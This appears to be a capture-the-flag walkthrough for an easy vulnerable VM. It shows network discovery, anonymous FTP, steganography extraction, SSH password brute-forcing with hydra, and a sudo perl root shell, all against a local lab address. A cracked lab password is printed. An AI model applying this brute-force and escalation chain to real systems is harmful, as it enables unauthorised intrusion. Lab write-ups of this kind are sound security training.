Difficulty level: Easy
Aim: Get root access and capture x3 flags.
The target IP is not provided, but can be easily discovered using arp-scan:
sudo arp-scan --interface=eth1 192.168.56.100/24
With the target identified we can run nmap to discover open ports/services:
nmap -sC -sV -vvv 192.168.56.116
From this we can see the following ports and services:
- port 21/tcp - FTP - (vsftpd 3.0.3 - with anonymous login allowed)
- port 22/tcp - SSH - OpenSSH 7.9p1
- port 80/tcp - HTTP - Apache httpd 2.4.38
The anonymous FTP sounds interesting and you may have noticed that nmap also identified a file named 'trytofind.jpg' during it's scan. We'll connect to the FTP service and download this:
ftp 192.168.56.116 anonymous <enter> ls -la get trytofind.jpg quit
It's not much use at the moment, but going off past experience there is likely to be some steganography involved here.
Let's move on to the HTTP service and check that in our browser:
Again, not much here, but let's throw gobuster at it to brute-force some directories:
gobuster dir -u http://192.168.56.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt```
We've found a blogs directory to explore:
Viewing the source code for this page reveals another hidden directory:
The source code for this page gives us a secret key:
We can use this key with steghide to extract hidden information from the JPG image we found earlier - the result is a file named data.txt:
steghide extract -sf trytofind.jpg cat data.txt
OK, we have discovered a user named renu and been told that this account has a weak password, so let's throw hydra at this and attempt to brute-force the SSH service:
hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.116
Success! We have a password for renu and can now login via SSH:
ssh [email protected] 987654321
The first flag can be found within the home directory of renu:
ls -la cat user1.txt
Further enumeration finds a user named lily, and that it is possible to access this users home directory, where we can find the second flag:
cd .. ls -la cd lily ls -la cat user2.txt
The current user renu has no sudo privileges, so it is likely we need to escalate to lily before we can go further.
The home directory for lily contains a .ssh folder with an authorized_keys file. The contents of this file shows that renu can login via SSH as lily without requiring a password:
ssh [email protected] <enter>
Great! We have escalated our privileges to lily.
Checking the sudo rights for lily, we can see that this user can run the /usr/bin/perl binary as root.
We can take advantage of this to elevate our privileges and spawn a root shell:
sudo perl -e 'exec "/bin/sh";'
Finally, we can switch into the /root directory and obtain the final flag:
cd /root ls -la cat .root.txt
Please feel free to contact me via Twitter and thanks for reading.